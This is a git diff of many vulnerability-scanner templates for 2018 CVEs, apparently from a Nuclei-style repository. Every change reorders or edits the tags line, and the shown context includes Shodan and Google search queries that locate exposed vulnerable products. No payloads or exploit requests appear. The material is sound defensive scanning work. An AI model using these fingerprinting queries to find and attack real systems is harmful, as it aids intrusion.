diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml
index 5243a776fb..ba01155d01 100644
--- a/http/cves/2018/CVE-2018-14474.yaml
+++ b/http/cves/2018/CVE-2018-14474.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: goodoldweb
product: orange_forum
- tags: cve2018,redirect,orangeforum,oss,seclists,cve,goodoldweb
+ tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml
index e04fd74fed..7fa33a55ea 100644
--- a/http/cves/2018/CVE-2018-14728.yaml
+++ b/http/cves/2018/CVE-2018-14728.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: tecrail
product: responsive_filemanager
- tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive,tecrail
+ tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail
http:
- method: POST
diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml
index f6488ad9ff..bc4f09de38 100644
--- a/http/cves/2018/CVE-2018-14916.yaml
+++ b/http/cves/2018/CVE-2018-14916.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: loytec
product: lgate-902_firmware
- tags: cve2018,loytec,lfi,packetstorm,seclists,cve
+ tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml
index db0d4fb837..de94c89cc2 100644
--- a/http/cves/2018/CVE-2018-14918.yaml
+++ b/http/cves/2018/CVE-2018-14918.yaml
@@ -28,7 +28,7 @@ info:
vendor: loytec
product: lgate-902_firmware
shodan-query: http.html:"LGATE-902"
- tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate
+ tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml
index b1d4888710..7da56cb3f3 100644
--- a/http/cves/2018/CVE-2018-15138.yaml
+++ b/http/cves/2018/CVE-2018-15138.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: ericssonlg
product: ipecs_nms
- tags: cve,cve2018,ericsson,lfi,traversal,edb,ericssonlg
+ tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml
index 1ea847bab5..e4f684c66a 100644
--- a/http/cves/2018/CVE-2018-15517.yaml
+++ b/http/cves/2018/CVE-2018-15517.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: dlink
product: central_wifimanager
- tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast
+ tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml
index 1ed9482828..9d5b3db59d 100644
--- a/http/cves/2018/CVE-2018-15745.yaml
+++ b/http/cves/2018/CVE-2018-15745.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: argussurveillance
product: dvr
- tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr
+ tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml
index d366cafeaf..482950cf7e 100644
--- a/http/cves/2018/CVE-2018-16133.yaml
+++ b/http/cves/2018/CVE-2018-16133.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: cybrotech
product: cybrohttpserver
- tags: lfi,packetstorm,cve,cve2018,cybrotech
+ tags: cve2018,cve,lfi,packetstorm,cybrotech
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml
index e18ef2c29e..6905b25796 100644
--- a/http/cves/2018/CVE-2018-16159.yaml
+++ b/http/cves/2018/CVE-2018-16159.yaml
@@ -29,7 +29,7 @@ info:
vendor: codemenschen
product: gift_vouchers
framework: wordpress
- tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin,codemenschen
+ tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml
index dcd6ba14cc..070cd72b8e 100644
--- a/http/cves/2018/CVE-2018-16167.yaml
+++ b/http/cves/2018/CVE-2018-16167.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: jpcert
product: logontracer
- tags: rce,oast,edb,cve,cve2018,logontracer,intrusive,jpcert
+ tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml
index 53116c52c7..b25c3e51b2 100644
--- a/http/cves/2018/CVE-2018-16283.yaml
+++ b/http/cves/2018/CVE-2018-16283.yaml
@@ -26,7 +26,7 @@ info:
vendor: wechat_brodcast_project
product: wechat_brodcast
framework: wordpress
- tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi,wechat_brodcast_project
+ tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml
index bac78bcc29..8848a728d7 100644
--- a/http/cves/2018/CVE-2018-16299.yaml
+++ b/http/cves/2018/CVE-2018-16299.yaml
@@ -28,7 +28,7 @@ info:
vendor: localize_my_post_project
product: localize_my_post
framework: wordpress
- tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018,localize_my_post_project
+ tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml
index 2ddc1df173..c83fea85b5 100644
--- a/http/cves/2018/CVE-2018-16670.yaml
+++ b/http/cves/2018/CVE-2018-16670.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: circontrol
product: circarlife_scada
- tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife,circontrol
+ tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml
index b845d9201d..6c658a8393 100644
--- a/http/cves/2018/CVE-2018-16671.yaml
+++ b/http/cves/2018/CVE-2018-16671.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: "circontrol"
product: circarlife_scada
- tags: iot,disclosure,edb,cve,cve2018,circarlife,scada,circontrol
+ tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml
index 479e4f0f35..4654af16ab 100644
--- a/http/cves/2018/CVE-2018-16836.yaml
+++ b/http/cves/2018/CVE-2018-16836.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: rubedo_project
product: rubedo
- tags: cve,cve2018,rubedo,lfi,edb,rubedo_project
+ tags: cve2018,cve,rubedo,lfi,edb,rubedo_project
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml
index dc302ff8a9..21d24047ce 100644
--- a/http/cves/2018/CVE-2018-16979.yaml
+++ b/http/cves/2018/CVE-2018-16979.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: monstra
product: monstra
- tags: cve,cve2018,crlf,mostra,mostracms,cms,monstra
+ tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml
index 7cc7c7ea3b..94b814b5f8 100644
--- a/http/cves/2018/CVE-2018-17153.yaml
+++ b/http/cves/2018/CVE-2018-17153.yaml
@@ -30,7 +30,7 @@ info:
vendor: western_digital
product: my_cloud_wdbctl0020hwt_firmware
shodan-query: http.favicon.hash:-1074357885
- tags: packetstorm,cve,cve2018,auth-bypass,rce,wdcloud,western_digital
+ tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml
index 98a34aba79..3460fa0bb3 100644
--- a/http/cves/2018/CVE-2018-17422.yaml
+++ b/http/cves/2018/CVE-2018-17422.yaml
@@ -27,7 +27,7 @@ info:
vendor: dotcms
product: dotcms
shodan-query: http.title:"dotCMS"
- tags: cve,cve2018,redirect,dotcms
+ tags: cve2018,cve,redirect,dotcms
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml
index 567fa239f7..99ab959924 100644
--- a/http/cves/2018/CVE-2018-17431.yaml
+++ b/http/cves/2018/CVE-2018-17431.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: comodo
product: unified_threat_management_firewall
- tags: cve2018,comodo,rce,edb,cve
+ tags: cve,cve2018,comodo,rce,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml
index 010c50e864..6193f51570 100644
--- a/http/cves/2018/CVE-2018-18069.yaml
+++ b/http/cves/2018/CVE-2018-18069.yaml
@@ -25,7 +25,7 @@ info:
vendor: wpml
product: wpml
framework: wordpress
- tags: cve,cve2018,wordpress,xss,plugin,wpml
+ tags: cve2018,cve,wordpress,xss,plugin,wpml
http:
- method: POST
diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml
index c2c16ddf3f..4fd37bae83 100644
--- a/http/cves/2018/CVE-2018-18323.yaml
+++ b/http/cves/2018/CVE-2018-18323.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: control-webpanel
product: webpanel
- tags: cve,cve2018,centos,lfi,packetstorm,control-webpanel
+ tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml
index 203743f286..9a324ed6d1 100644
--- a/http/cves/2018/CVE-2018-18570.yaml
+++ b/http/cves/2018/CVE-2018-18570.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: planonsoftware
product: planon
- tags: xss,cve,cve2018,planon,planonsoftware
+ tags: cve,cve2018,xss,planon,planonsoftware
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml
index 19b5646518..a567542a7e 100644
--- a/http/cves/2018/CVE-2018-18608.yaml
+++ b/http/cves/2018/CVE-2018-18608.yaml
@@ -28,7 +28,7 @@ info:
vendor: dedecms
product: dedecms
shodan-query: http.html:"DedeCms"
- tags: dedecms,xss,cve,cve2018
+ tags: cve2018,cve,dedecms,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml
index 278adf6bec..c8f6de11a0 100644
--- a/http/cves/2018/CVE-2018-18775.yaml
+++ b/http/cves/2018/CVE-2018-18775.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: microstrategy
product: microstrategy_web
- tags: cve2018,microstrategy,xss,edb,packetstorm,cve,intrusive
+ tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml
index a0dfdee854..8764238f55 100644
--- a/http/cves/2018/CVE-2018-18777.yaml
+++ b/http/cves/2018/CVE-2018-18777.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: microstrategy
product: microstrategy_web
- tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi
+ tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml
index 9ba7ae7486..426baae017 100644
--- a/http/cves/2018/CVE-2018-18809.yaml
+++ b/http/cves/2018/CVE-2018-18809.yaml
@@ -30,7 +30,7 @@ info:
vendor: tibco
product: jasperreports_library
shodan-query: html:"jasperserver-pro"
- tags: packetstorm,seclists,cve,cve2018,lfi,kev,jasperserver,jasperreport,tibco
+ tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml
index c58c977e81..3276185ffa 100644
--- a/http/cves/2018/CVE-2018-18925.yaml
+++ b/http/cves/2018/CVE-2018-18925.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: gogs
product: gogs
- tags: gogs,lfi,rce,vulhub,cve,cve2018
+ tags: cve,cve2018,gogs,lfi,rce,vulhub
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml
index d34619082b..2d94790170 100644
--- a/http/cves/2018/CVE-2018-19136.yaml
+++ b/http/cves/2018/CVE-2018-19136.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: domainmod
product: domainmod
- tags: edb,cve,cve2018,domainmod,xss,authenticated
+ tags: cve2018,cve,edb,domainmod,xss,authenticated
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml
index 7df56138dc..a83be26c05 100644
--- a/http/cves/2018/CVE-2018-19287.yaml
+++ b/http/cves/2018/CVE-2018-19287.yaml
@@ -30,7 +30,7 @@ info:
vendor: ninjaforma
product: ninja_forms
framework: wordpress
- tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress,ninjaforma
+ tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml
index d188573b0f..3df1ec764c 100644
--- a/http/cves/2018/CVE-2018-19326.yaml
+++ b/http/cves/2018/CVE-2018-19326.yaml
@@ -30,7 +30,7 @@ info:
vendor: zyxel
product: vmg1312-b10d_firmware
shodan-query: http.html:"VMG1312-B10D"
- tags: lfi,modem,router,edb,cve,cve2018,zyxel
+ tags: cve2018,cve,lfi,modem,router,edb,zyxel
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml
index 4339c7164c..aab4155860 100644
--- a/http/cves/2018/CVE-2018-19365.yaml
+++ b/http/cves/2018/CVE-2018-19365.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: wowza
product: streaming_engine
- tags: cve,cve2018,wowza,lfi
+ tags: cve2018,cve,wowza,lfi
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml
index d9054d6e9e..24d3ed1a57 100644
--- a/http/cves/2018/CVE-2018-19439.yaml
+++ b/http/cves/2018/CVE-2018-19439.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: oracle
product: secure_global_desktop
- tags: oracle,xss,seclists,packetstorm,cve,cve2018
+ tags: cve,cve2018,oracle,xss,seclists,packetstorm
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml
index d82dffc40e..8c24d7f9eb 100644
--- a/http/cves/2018/CVE-2018-19458.yaml
+++ b/http/cves/2018/CVE-2018-19458.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: php-proxy
product: php-proxy
- tags: edb,cve,cve2018,lfi,proxy,php-proxy
+ tags: cve,cve2018,edb,lfi,proxy,php-proxy
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml
index 14719b1d6f..b12f2090f9 100644
--- a/http/cves/2018/CVE-2018-19749.yaml
+++ b/http/cves/2018/CVE-2018-19749.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: cve,cve2018,domainmod,xss,authenticated,edb
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml
index b5226e33cc..f94627037a 100644
--- a/http/cves/2018/CVE-2018-19752.yaml
+++ b/http/cves/2018/CVE-2018-19752.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: cve,cve2018,domainmod,xss,authenticated,edb
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml
index 3e830716a2..010a02dd68 100644
--- a/http/cves/2018/CVE-2018-19753.yaml
+++ b/http/cves/2018/CVE-2018-19753.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: oracle
product: tarantella_enterprise
- tags: packetstorm,seclists,cve,cve2018,tarantella,lfi,oracle
+ tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml
index d968d063f0..9b0fbf8b12 100644
--- a/http/cves/2018/CVE-2018-19877.yaml
+++ b/http/cves/2018/CVE-2018-19877.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: adiscon
product: loganalyzer
- tags: adiscon,xss,edb,cve,cve2018
+ tags: cve,cve2018,adiscon,xss,edb
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml
index 8a28d837a1..ac04f2b1aa 100644
--- a/http/cves/2018/CVE-2018-19892.yaml
+++ b/http/cves/2018/CVE-2018-19892.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: cve2018,domainmod,xss,authenticated,edb,cve
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml
index 3eaccfcd7d..5b866bcd2e 100644
--- a/http/cves/2018/CVE-2018-19914.yaml
+++ b/http/cves/2018/CVE-2018-19914.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: cve2018,domainmod,xss,authenticated,edb,cve
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml
index b0dbc9ab39..3f0060ea2d 100644
--- a/http/cves/2018/CVE-2018-19915.yaml
+++ b/http/cves/2018/CVE-2018-19915.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: domainmod,xss,authenticated,edb,cve,cve2018
+ tags: cve,cve2018,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml
index 8718eab82a..813a42ac28 100644
--- a/http/cves/2018/CVE-2018-20009.yaml
+++ b/http/cves/2018/CVE-2018-20009.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: domainmod,xss,authenticated,edb,cve,cve2018
+ tags: cve,cve2018,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml
index 6dc7823d93..adc813a71b 100644
--- a/http/cves/2018/CVE-2018-20010.yaml
+++ b/http/cves/2018/CVE-2018-20010.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: domainmod,xss,authenticated,edb,cve,cve2018
+ tags: cve,cve2018,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml
index 5891e64bf8..7e2566bd22 100644
--- a/http/cves/2018/CVE-2018-20011.yaml
+++ b/http/cves/2018/CVE-2018-20011.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: domainmod,xss,authenticated,edb,cve,cve1028
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml
index 00353499c4..ec0ed51403 100644
--- a/http/cves/2018/CVE-2018-20462.yaml
+++ b/http/cves/2018/CVE-2018-20462.yaml
@@ -27,7 +27,7 @@ info:
vendor: jsmol2wp_project
product: jsmol2wp
framework: wordpress
- tags: cve,cve2018,wordpress,xss,wp-plugin,jsmol2wp_project
+ tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml
index 60ae3b146e..d704c9d9d6 100644
--- a/http/cves/2018/CVE-2018-20463.yaml
+++ b/http/cves/2018/CVE-2018-20463.yaml
@@ -29,7 +29,7 @@ info:
vendor: jsmol2wp_project
product: jsmol2wp
framework: wordpress
- tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal,jsmol2wp_project
+ tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml
index be286753d9..076417e913 100644
--- a/http/cves/2018/CVE-2018-20470.yaml
+++ b/http/cves/2018/CVE-2018-20470.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: sahipro
product: sahi_pro
- tags: cve,cve2018,lfi,packetstorm,sahipro
+ tags: cve2018,cve,lfi,packetstorm,sahipro
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml
index 61d2813e02..79733b8668 100644
--- a/http/cves/2018/CVE-2018-20608.yaml
+++ b/http/cves/2018/CVE-2018-20608.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: txjia
product: imcat
- tags: cve,cve2018,imcat,phpinfo,config,txjia
+ tags: cve2018,cve,imcat,phpinfo,config,txjia
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml
index 62d4dbb318..b54c2a9568 100644
--- a/http/cves/2018/CVE-2018-20824.yaml
+++ b/http/cves/2018/CVE-2018-20824.yaml
@@ -25,7 +25,7 @@ info:
vendor: atlassian
product: jira
shodan-query: http.component:"Atlassian Jira"
- tags: cve,cve2018,atlassian,jira,xss
+ tags: cve2018,cve,atlassian,jira,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml
index befb4c1515..51a8b87fe5 100644
--- a/http/cves/2018/CVE-2018-2791.yaml
+++ b/http/cves/2018/CVE-2018-2791.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: oracle
product: webcenter_sites
- tags: edb,cve,cve2018,oracle,xss,wcs
+ tags: cve2018,cve,edb,oracle,xss,wcs
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml
index 4f3393b42f..681b9fadc5 100644
--- a/http/cves/2018/CVE-2018-2894.yaml
+++ b/http/cves/2018/CVE-2018-2894.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: oracle
product: weblogic_server
- tags: cve2018,oracle,weblogic,rce,vulhub,cve,intrusive
+ tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml
index d151e086d0..c33a465439 100644
--- a/http/cves/2018/CVE-2018-3238.yaml
+++ b/http/cves/2018/CVE-2018-3238.yaml
@@ -25,7 +25,7 @@ info:
max-request: 3
vendor: oracle
product: webcenter_sites
- tags: cve,cve2018,oracle,wcs,xss
+ tags: cve2018,cve,oracle,wcs,xss
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml
index 7ae3b6ab26..4e62f19b62 100644
--- a/http/cves/2018/CVE-2018-3760.yaml
+++ b/http/cves/2018/CVE-2018-3760.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: redhat
product: cloudforms
- tags: cve,cve2018,rails,lfi,ruby,vulhub,seclists,redhat
+ tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml
index 4ded6480b0..4e30ef3f4e 100644
--- a/http/cves/2018/CVE-2018-3810.yaml
+++ b/http/cves/2018/CVE-2018-3810.yaml
@@ -28,7 +28,7 @@ info:
vendor: oturia
product: smart_google_code_inserter
framework: wordpress
- tags: wordpress,cve,cve2018,google,edb,oturia
+ tags: cve,cve2018,wordpress,google,edb,oturia
http:
- method: POST
diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml
index e899a019f4..ade100d304 100644
--- a/http/cves/2018/CVE-2018-5316.yaml
+++ b/http/cves/2018/CVE-2018-5316.yaml
@@ -28,7 +28,7 @@ info:
vendor: patsatech
product: sagepay_server_gateway_for_woocommerce
framework: wordpress
- tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve,patsatech
+ tags: cve2018,cve,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,patsatech
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml
index 485fa24f10..791fdf6279 100644
--- a/http/cves/2018/CVE-2018-5715.yaml
+++ b/http/cves/2018/CVE-2018-5715.yaml
@@ -28,7 +28,7 @@ info:
product: sugarcrm
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
google-query: intext:"SugarCRM Inc. All Rights Reserved"
- tags: sugarcrm,xss,edb,cve,cve2018
+ tags: cve2018,cve,sugarcrm,xss,edb
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml
index e09b1d654e..aa81e61fd5 100644
--- a/http/cves/2018/CVE-2018-6008.yaml
+++ b/http/cves/2018/CVE-2018-6008.yaml
@@ -26,7 +26,7 @@ info:
vendor: joomlatag
product: jtag_members_directory
framework: joomla\!
- tags: cve,cve2018,joomla,lfi,edb,packetstorm,joomlatag,joomla\!
+ tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\!
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml
index 4c4c5092dc..d9eea7958b 100644
--- a/http/cves/2018/CVE-2018-6184.yaml
+++ b/http/cves/2018/CVE-2018-6184.yaml
@@ -27,7 +27,7 @@ info:
vendor: zeit
product: next.js
shodan-query: html:"/_next/static"
- tags: cve,cve2018,nextjs,lfi,traversal,zeit
+ tags: cve2018,cve,nextjs,lfi,traversal,zeit
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml
index b53cc324d5..13457ae61e 100644
--- a/http/cves/2018/CVE-2018-7282.yaml
+++ b/http/cves/2018/CVE-2018-7282.yaml
@@ -27,7 +27,7 @@ info:
product: printmonitor
shodan-query: title:"PrintMonitor"
product": printmonitor
- tags: cve,cve2018,sqli,printmonitor,unauth,titool
+ tags: cve2018,cve,sqli,printmonitor,unauth,titool
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml
index 55b74bb209..837ae1a8e9 100644
--- a/http/cves/2018/CVE-2018-7422.yaml
+++ b/http/cves/2018/CVE-2018-7422.yaml
@@ -28,7 +28,7 @@ info:
vendor: siteeditor
product: site_editor
framework: wordpress
- tags: cve,cve2018,wordpress,wp-plugin,lfi,edb,seclists,siteeditor
+ tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml
index 4dfcb25342..b0b697c67b 100644
--- a/http/cves/2018/CVE-2018-7467.yaml
+++ b/http/cves/2018/CVE-2018-7467.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: axxonsoft
product: next
- tags: axxonsoft,lfi,packetstorm,cve,cve2018
+ tags: cve,cve2018,axxonsoft,lfi,packetstorm
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml
index 315cb70465..9b6abb01b6 100644
--- a/http/cves/2018/CVE-2018-7490.yaml
+++ b/http/cves/2018/CVE-2018-7490.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: unbit
product: uwsgi
